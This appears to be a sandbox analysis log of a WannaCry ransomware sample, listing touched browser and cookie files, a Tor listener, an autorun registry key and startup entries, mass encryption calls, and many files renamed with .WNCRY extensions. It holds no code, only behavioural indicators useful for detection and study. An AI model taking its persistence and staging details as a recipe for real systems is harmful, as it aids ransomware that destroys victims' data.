file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Low
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt.WNCRY
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Platform Notifications
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt.WNCRY
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt.WNCRY
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt.WNCRY
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt.WNCRY
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt.WNCRY
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db.WNCRY
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt.WNCRY
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\6af35b70-7d44-4f46-9acd-3b4fa9cd6081
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt.WNCRY
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt.WNCRY
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRY
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt.WNCRY
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt.WNCRY
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRY
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Platform Notifications
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt.WNCRY
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\44191681-e6d2-41ed-948c-a2cdae484e83
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\JumpListIconsRecentClosed
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt.WNCRY
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Touches a file containing cookies, possibly for information gathering
Process: wannacry.exe (3040)
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies
Process: wannacry.exe (3040)
file C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies
Starts servers listening on 127.0.0.1:9050
Installs Tor on the infected machine
Installs itself for autorun at Windows startup
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\qobyhffdhzmp201
data: "C:\Users\user\AppData\Local\Temp\tasksche.exe"
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD31C3.tmp
file: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\~SDA434.tmp
Performs a large number of encryption calls using the same key possibly indicative of ransomware file encryption behavior
encryption: The crypto key 0x00964458 was used 539 times to encrypt data
Exhibits possible ransomware or wiper file modification behavior: mass_file_deletion overwrites_existing_files
file: C:\Users\user\AppData\Local\Temp\c.wnry
file: C:\Users\user\AppData\Local\Temp\00000000.res
file: C:\Users\user\AppData\Local\Temp\@Please_Read_Me@.txt
file: C:\ba69bdf0a250e352360c33\1025\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1028\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1029\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1030\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1031\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1032\eula.rtf.WNCRYT
file: C:\Users\user\AppData\Local\Temp\f.wnry
file: C:\ba69bdf0a250e352360c33\1033\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1035\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1036\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1037\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1038\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1040\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1041\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1042\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1043\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1044\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1045\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1046\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1049\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1053\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1055\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\2052\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\2070\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\3082\eula.rtf.WNCRYT
file: C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.fPMufFfM.20251206093923.txt.WNCRYT
file: C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.S6TbHpZ5.20251206094405.txt.WNCRYT
file: C:\Sysmon\sysmonconfig.txt.WNCRYT
file: C:\ProgramData\Boxstarter\LICENSE.txt.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRYT
file: C:\ProgramData\chocolatey\CREDITS.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\7zip.install\legal\LICENSE.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\autohotkey.install\tools\license.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\autohotkey.install\tools\VERIFICATION.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.bootstrapper\tools\LICENSE.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\LICENSE.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\LICENSE.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\Boxstarter.HyperV\tools\LICENSE.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\BoxStarter.WinConfig\tools\LICENSE.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\Firefox\tools\LanguageChecksums.csv.WNCRYT
file: C:\ProgramData\chocolatey\lib\openjdk\openjdk-19.0.1_windows-x64_bin.zip.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\powershell-core\tools\ThirdPartyNotices.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\python3\legal\LICENSE.txt.WNCRYT
file: C:\ProgramData\chocolatey\lib\winrar\tools\downloadInfo.csv.WNCRYT
file: C:\ProgramData\chocolatey\tools\7zip.license.txt.WNCRYT
file: C:\ProgramData\chocolatey\tools\shimgen.license.txt.WNCRYT
file: C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ThirdPartyNotices.txt.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\main.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg.WNCRYT
file: C:\BOOTSECT.BAK.WNCRYT
file: C:\ba69bdf0a250e352360c33\header.bmp.WNCRYT
file: C:\ba69bdf0a250e352360c33\SplashScreen.bmp.WNCRYT
file: C:\ba69bdf0a250e352360c33\watermark.bmp.WNCRYT
file: C:\ProgramData\Boxstarter\BoxstarterShell.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\chocolateyUninstall.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Boxstarter.zip.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Send-File.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Confirm-Choice.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Enter-DotNet4.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Get-CurrentUser.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Get-HttpResource.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Get-IsRemote.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Init-Settings.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Invoke-FromTask.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Start-TimedSection.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Stop-TimedSection.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Test-Admin.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Enable-UAC.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Get-UAC.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRYT
file: C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRYT
file: C:\ProgramData\chocolatey\bin\RefreshEnv.cmd.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-compatibility\helpers\Get-PackageParameters.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-compatibility\helpers\Get-UninstallRegistryKey.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-compatibility\helpers\Install-ChocolateyDesktopLink.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateyFailure.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateySuccess.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-compatibility\helpers\Write-FileUpdateLog.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-core\Get-AppInstallLocation.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-core\Get-AvailableDriveLetter.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-core\Get-EffectiveProxy.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-core\Get-PackageCacheLocation.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-core\Get-WebContent.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-core\Register-Application.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-core\Remove-Process.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-dotnetfx\DotNetFrameworkHelpers.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-dotnetfx\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-windowsupdate\Get-WindowsUpdateErrorDescription.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-windowsupdate\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-windowsupdate\Install-WindowsUpdate.ps1.WNCRYT
file: C:\ProgramData\chocolatey\extensions\chocolatey-windowsupdate\Test-WindowsUpdate.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\chocolateyScriptRunner.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\ChocolateyTabExpansion.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Format-FileSize.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Get-CheckSumValid.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Get-ChocolateyPath.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Get-ChocolateyUnzip.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Get-ChocolateyWebFile.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Get-EnvironmentVariable.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Get-EnvironmentVariableNames.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Get-FtpFile.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Get-OSArchitectureWidth.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Get-PackageParameters.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Get-ToolsLocation.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Get-UACEnabled.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Get-UninstallRegistryKey.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Get-VirusCheckValid.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Get-WebFile.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Get-WebFileName.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Get-WebHeaders.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Install-BinFile.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Install-ChocolateyFileAssociation.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Install-ChocolateyInstallPackage.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Install-ChocolateyPackage.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Install-ChocolateyPath.ps1.WNCRYT
file: C:\ProgramData\chocolatey\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1.WNCRYT
